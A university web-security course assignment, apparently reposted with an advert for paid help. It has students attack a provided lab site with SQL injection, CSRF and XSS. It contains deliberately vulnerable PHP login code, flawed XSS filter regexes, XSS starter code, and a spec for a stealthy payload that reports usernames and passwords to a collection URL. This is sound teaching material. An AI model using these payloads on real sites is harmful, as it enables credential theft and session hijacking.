CIS 5510—Computer and Network & Security

2024-12-03 Admin 写评论

Hello, if you have any need, please feel free to consult us, this is my wechat: wx91due

CIS 5510—Computer and Network & Security
Project 3: Web Security

You may work with one other student. The code and other answers you submits must be entirelyyour own work (alongside your partner), and you must adhere to the Code of Academic Integrity.

You may consult published references, provided that you appropriately cite them (e.g., with programcomments), as you would in an academic paper.

Solutions must be submitted electronically through Gradescope, following the submission checklistat the end of this file.

Introduction

In this project, we provide an insecure website, and your job is to attack it by exploiting three common classes of vulnerabilities: cross-site scripting (XSS), cross-site request forgery (CSRF), and SQL injection. You are also asked to exploit these problems with various flawed defenses in place. Understanding how these attacks work will help you better defend your own web applications.

Objectives

• Learn to spot common vulnerabilities in websites and to avoid them in your own projects.
• Understand the risks these problems pose and the weaknesses of naive defenses.
• Gain experience with web architecture and with HTML, JavaScript, and SQL programming.

Read This First

This project asks you to develop attacks and test them, with our permission, against a target website that we are providing for this purpose. Attempting the same kinds of attacks against other websites without authorization is prohibited by law and university policies and may result in fines, expulsion, and jail time. You must not attack any website without authorization! You must respect the privacy and property rights of others at all times.

Target Website

A startup named Yay! is about to launch its first product—a web search engine—but their investors are nervous about security problems. Unlike the Yay! employees who developed the site, you took CIS 5510, so the investors have hired you to perform a security evaluation before it goes live.

Yay! is available for you to test at https://cis551.cis.upenn.edu/project3/.

The site is written in Python using the Bottle web framework. Although Bottle has built-in mechanisms that help guard against some common vulnerabilities, the Yay! employees havecircumvented or ignored these mechanisms in several places.

In addition to providing search results, the site accepts logins and tracks users’ search histories. It stores usernames, passwords, and search history in a MySQL database.

Before being granted access to the source code, you reverse engineered the site and determined that it replies to five main file paths: /, /search, /login, /logout, and /create. The function of these file paths is explained below, but if you want an additional challenge, you can skip the rest of this section and do the reverse engineering yourself.

Main page (/) The main page accepts GET requests and displays a search form. When submitted,this form issues a GET request to /search, sending the search string as the parameter “q”.

If no user is logged in, the main page also displays a form that gives the user the option of logging in or creating an account. The form issues POST requests to /login and /create.

Search results (/search) The search results page accepts GET requests and prints the search string, supplied in the “q” query parameter, along with the search results. If the user is logged in, the page also displays the user’s recent search history in a sidebar.

Note: Since actual search is not relevant to this project, you might not receive any results.

Login handler (/login) The login handler accepts POST requests and takes plaintext “username” and “password” query parameters. It checks the user database to see if a user with those credentials exists. If so, it sets a login cookie and redirects the browser to the main page. The cookie tracks which user is logged in; manipulating or forging it is not part of this project.

Logout handler (/logout) The logout handler accepts POST requests. It deletes the login cookie, if set, and redirects the browser to the main page.

Create account handler (/create) The create account handler accepts POST requests and re ceives plaintext “username” and “password” query parameters. It inserts the username and password into the database of users, unless a user with that username already exists. It thenlogs the user in and redirects the browser to the main page.

Note: The password is neither sent nor stored securely; however, none of the attacks you implement should depend on this behavior. You should choose a password that other studentswill not guess, but never use an important password to test an insecure site!

Guidelines

We have tested this project in several versions of Chrome and Firefox. However, the specific attacks (i.e., the concrete code you write) may work on one browser and version but not on another. To avoid ambiguity, the exact version of the browser that we’ll test with is Chrome 130. This was the latest version of Chrome as of October 2024.

Note that the latest versions of Firefox include additional protections called third-party cookie blocking. This prevents some of the attacks in this project (a good thing in general, not good for our project purposes). Chrome has not implemented the same security features, so we can exploit it.

You will receive no credit if your attacks work on a different browser but not on the above browser.

For your convenience during manual testing, we have included drop-down menus at the top of eachpage that let you change the CSRF and XSS defenses that are in use. The solutions you submit must override these selections by including the csrfdefense=n or xssdefense=n parameter in the target URL, as specified in each task below. You may not attempt to subvert the mechanism forchanging the level of defense in your attacks.

In all parts, you should implement the simplest attack you can think of that defeats the given set ofdefenses. In other words, do not simply attack the highest level of defense and submit that attack asyour solution for all defenses. Also, you do not need to try to combine the vulnerabilities, except where explicitly stated below.

The extra credit questions are intended to make you think hard. At least one has a clever but simple solution, and at least one is an open problem.

Resources

Your browser’s Developer Tools will be a tremendous help for this project, particularly the JavaScriptconsole and debugger, DOM inspector, and network monitor. The developer tools can be found under Tools > Web Developer in Firefox. See https://developer.mozilla.org/en-US/docs/Tools.

Your solutions will involve manipulating SQL statements and writing Web code using HTML, JavaScript, and the jQuery library. Feel free to search the web for answers to basic how-to questions. There are many fine online resources for learning these tools. We recommend a few below.

Web development

SQL Tutorial https://sqlzoo.net/
Introduction to HTML https://developer.mozilla.org/en-US/docs/Web/Guide/HTML/Introduction
Using jQuery Core https://learn.jquery.com/using-jquery-core/
jQuery API Reference https://api.jquery.com

Attacks

To get an idea of what the different attacks actually look like, below are some resources that you should definitely read.
SQL Injection https://www.owasp.org/index.php/SQL_Injection
CSRF https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)
XSS https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)

Defenses (and more details of the attacks)

https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html
https://cheatsheetseries.owasp.org/cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.
html
https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet

Part 1. SQL Injection

Your first goal is to demonstrate SQL injection attacks that log you in as an arbitrary user without knowing the password. In order to protect other students’ accounts, we have made a series of separate login forms for you to attack that aren’t part of the main Yay! site. For each of the following defenses, provide inputs to the target login form that successfully log you in as the user “victim”.

IMPORTANT NOTE: if after you submit your attack the web site does not explicitly show the line “Submit the following line as your solution:”, it means that your solution was not correct even though it might say “login successful”. Typically this happens because you did successfully log inas some user, but not as a user with the exact username “victim”.

1.0 No defenses

Target: https://cis551.cis.upenn.edu/project3/sqlinject0/
Submission: sql_inj_0.txt

1.1 Simple escaping

The server escapes single quotes (’) in the inputs by replacing them with two single quotes.
Target: https://cis551.cis.upenn.edu/project3/sqlinject1/
Submission: sql_inj_1.txt

1.2 Escaping and hashing [Extra credit]

The server uses the following PHP code, which escapes the username and applies the MD5 hash function to the password.

if (isset($_POST[’username’]) and isset($_POST[’password’])) {
$username = mysql_real_escape_string($_POST[’username’]);
$password = md5($_POST[’password’], true);
$sql_s = "SELECT * FROM users WHERE username=’$username’ and pw=’$password’";
$rs = mysql_query($sql_s);
if (mysql_num_rows($rs) > 0) {
echo "Login successful!";
} else {
echo "Incorrect username or password";
}
}

You will need to write a program to produce a working exploit. You can use any language you like, but we recommend C.

Target: https://cis551.cis.upenn.edu/project3/sqlinject2/
Submissions: sql_inj_2.txt and sql_inj_2.c (your program)
1.3 Double escaping [Extra credit]

The server works similarly to the previous example, but instead of hashing, it escapes the password in the same way as the username, by calling mysql_real_escape_string().

Target: https://cis551.cis.upenn.edu/project3/sqlinject3/
Submission: sql_3.txt

What to submit. When you successfully log in as victim, the server will provide a URL-encodedversion of your form inputs. Submit a text file with the specified filename containing only this line.

Part 2. Cross-site Request Forgery (CSRF)

Your next task is to demonstrate CSRF vulnerabilities against the login form, and Yay! has provided two variations of their implementation for you to test. Your goal is to construct attacks that cause the victim to log in to an account you control, thus allowing you to monitor the victim’s search queries by viewing the search history for this account. For each of the defenses below, create an HTML file that, when opened by a victim, logs their browser into Yay! under the account “attacker” and password “123456”.1

Your solutions should not display evidence of an attack; the browser should just display a blank page. (If the victim later visits Yay!, it will say “logged in as attacker”, but that is fine for purposes of the project. After all, most users will not immediately notice.)

Note: if you just try to open the links below in your browser you will get a “405 Method not allowed” error. This is expected. These links are meant to be used by your CSRF attack.
2.0 No defenses
Target: https://cis551.cis.upenn.edu/project3/login?csrfdefense=0&xssdefense=4
Submission: yay_csrf_0.html
2.1 Token validation
The server sets a cookie named csrf_token to a random 16-byte value and also include this value as a hidden field in the login form. When the form is submitted, the server verifies that the client’s cookie matches the value in the form. You are allowed to exploit the XSS vulnerability from Part 3 to accomplish your goal.
Target: https://cis551.cis.upenn.edu/project3/login?csrfdefense=1&xssdefense=0
Submission: yay_csrf_1.html
2.2 Token validation, without XSS [Extra credit]
Accomplish the same task as in 2.1 without using XSS.
Target: https://cis551.cis.upenn.edu/project3/login?csrfdefense=1&xssdefense=4
Submission: yay_csrf_2.html

What to submit For each part, submit an HTML file with the given name that accomplishes the specified attack against the specified target URL. The HTML files you submit must be self contained, but they may embed CSS and JavaScript. Your files may also load jQuery from the URL https://ajax.googleapis.com/ajax/libs/jquery/2.0.3/jquery.min.js. Make sure you test your solutions work on the browser specified at the beginning of this PDF. You can also install that browser in the provided VM and confirm that they continue to work there. We will use this setup for grading.

Note: Since you are sharing the attacker account with other students, we have hard coded it so the search history will not actually update. You can test with a different account you create to see the history change.

Part 3. Cross-site Scripting (XSS)

Your final goal is to demonstrate XSS attacks against the Yay! search box, which does not properly filter search terms before echoing them to the results page. For each of the defenses below, your goal is to construct a URL that, if loaded in the victim’s browser, correctly executes the payload specified below. We recommend that you begin by testing with a simple payload (e.g., alert(0);), then move on to the full payload. Note that you should be able to implement the payload once, then use different means of encoding it to bypass the different defenses.

Payload

The payload (the code that the attack tries to execute) will be an extended form of spying and password theft. After the victim visits the URL you create, all functions of the Yay! site should be under control of your code and should report what the user is doing to a server you control, until the user leaves the site. Your payload needs to accomplish these goals:
Stealth:
• Display all pages correctly, with no significant evidence of attack.
(Minor text formatting glitches are acceptable.)
• Display normal URLs in the browser’s location bar, with no evidence of attack.
(Hint: Learn about the HTML5 History API.)
• Hide evidence of attack in the Yay! search history view, as long as your code is running.
Persistence:
• Continue the attack if the user navigates to another page on the site by following a link or submitting a form, including by logging in or logging out. (Your code does not have to continue working if the user’s actions trigger an error that isn’t the fault of your code.)
• Continue the attack if the user navigates to another Yay! page by using the browser’s back or forward buttons.
Spying:
• Report all login and logout events by loading the URLs:
http://127.0.0.1:31337/stolen?event=login&user=<username>&pass=<password>
http://127.0.0.1:31337/stolen?event=logout&user=<username>
You can test receiving this data on your local machine by running a basic Python 3 server:
$ python3 -m http.server 31337
• Report each page that is displayed (what the user thinks they’re seeing) by loading the URL:
http://127.0.0.1:31337/stolen?event=nav&user=<username>&url=<encoded_url>
(<username> should be omitted if no user is logged in.)

Defenses

There are four levels of defense. In each case, you should submit the simplest attack you can find that works against that defense; you should not simply attack the highest level and submit your solution for that level for every level. Try to use a different technique for each defense. The Python code that implements each defense is shown below, along with the target URL and the filename you should submit. In the next section we give you some code to help you get started.
3.0 No defenses
Target: https://cis551.cis.upenn.edu/project3/search?xssdefense=0
Submission: yay_xss_0.txt
Also submit a human readable version of the code you use to generate your URL, as a file
named yay_xss_payload.html.
3.1 Remove “script”
filtered = re.sub(r"(?i)script", "", input)
Target: https://cis551.cis.upenn.edu/project3/search?xssdefense=1
Submission: yay_xss_1.txt
3.2 Remove several tags
filtered = re.sub(r"(?i)script|<img|<body|<style|<meta|<embed|<object",
"", input)
Target: https://cis551.cis.upenn.edu/project3/search?xssdefense=2
Submission: yay_xss_2.txt
3.3 Remove some punctuation
filtered = re.sub(r"[;’\"]", "", input)
Target: https://cis551.cis.upenn.edu/project3/search?xssdefense=3
Submission: yay_xss_3.txt
3.4 Encode < and > [Extra credit]
filtered = input.replace("<", "<").replace(">", ">")
Target: https://cis551.cis.upenn.edu/project3/search?xssdefense=4
Submission: yay_xss_4.txt
What to submit. Your submission for each level of defense will be a text file with the specified filename that contains a single line consisting of a URL. When this URL is loaded in a victim’s browser, it should execute the specified payload against the specified target. The payload encoded in your URLs must be self-contained, but they may embed CSS and JavaScript. Your payload may also load jQuery from the URL https://ajax.googleapis.com/ajax/libs/jquery/2.0.3/jquery.min.js. Make sure you test your solutions in the Firefox browser we will use for grading. Also, you might want to clear your cookies between attacks to make sure your latest attack is working as you expect.

Framework Code

You may build your solution from the following framework if you wish.
<html>
<meta charset="utf-8">
<script src="https://ajax.googleapis.com/ajax/libs/jquery/2.0.3/jquery.min.js">
</script>
<script>
// Extend this function:
function payload(attacker) {
function proxy(href) {
$("html").load(href, function(){
$("html").show();
$("#query").val("pwned!");
});
}
$("html").hide();
proxy("./");
}
function makeLink(xssdefense, target, attacker) {
if (xssdefense == 0) {
return target + "./search?xssdefense=" + xssdefense.toString() + "&q=" +
encodeURIComponent("<script" + ">" + payload.toString() +
";payload(\"" + attacker + "\");</script" + ">");
} else {
// Implement code to defeat XSS defenses here.
}
}
var xssdefense = 0;
var target = "https://cis551.cis.upenn.edu/project3/";
var attacker = "http://127.0.0.1:31337/";
$(function() {
var url = makeLink(xssdefense, target, attacker);
$("h3").html("<a target=\"run\" href=\"" + url + "\">Try Yay!</a>");
});
</script>
<h3></h3>
</html>

Part 4. Writeup: Better Defenses

For each of the three attacks (SQL injection, CSRF, and XSS), write a short paragraph about the techniques Yay! should use to defend against that attack. Place these paragraphs in a file entitled “writeup.txt”. If you find any additional security vulnerabilities in the site or have suggestions about how we might improve this project in the future, include them as well.

Submission Checklist

Upload to Gradescope each of the files. When applicable, your solutions may contain embedded JavaScript or CSS, and they may load jQuery from the URL https://ajax.googleapis.com/ajax/libs/ jquery/2.0.3/jquery.min.js, but they must be otherwise self-contained. Please make sure you test your solutions in Firefox 79.0, which is the browser we will use for grading.

Part 1: SQL Injection

Text files that contain URL-encoded versions of your form fields for the specified SQL injection attacks. These strings will be provided to you by the server when your exploit works.
sql_inj_0.txt 1.0 No defenses
sql_inj_1.txt 1.1 Simple escaping
sql_inj_2.txt, sql_inj_2.c 1.2 Escaping and hashing [Extra credit]
sql_inj_3.txt 1.3 [Extra credit]

Part 2: CSRF

HTML files that, when loaded in a browser, immediately carry out the specified CSRF attack against the specified target.
yay_csrf_0.html 2.0 No defenses
yay_csrf_1.html 2.1 Token validation
yay_csrf_2.html 2.2 Token validation, without XSS [Extra credit]

Part 3: XSS

Text files, each containing a URL that, when loaded in a browser, immediately carries out the specified XSS attack against the specified target. Also submit an HTML file containing the human readable code you used to generate the URL for part 3.0.
yay_xss_payload.html
yay_xss_0.txt 3.0 No defenses
yay_xss_1.txt 3.1 Remove “script”
yay_xss_2.txt 3.2 Remove several tags
yay_xss_3.txt 3.3 Remove some punctuation
yay_xss_4.txt* 3.4 Encode < and > [Extra credit]

Part 4: Writeup

A text file containing your suggested defenses against each of the attacks.
writeup.txt

发表评论

电子邮件地址不会被公开。 必填项已用*标注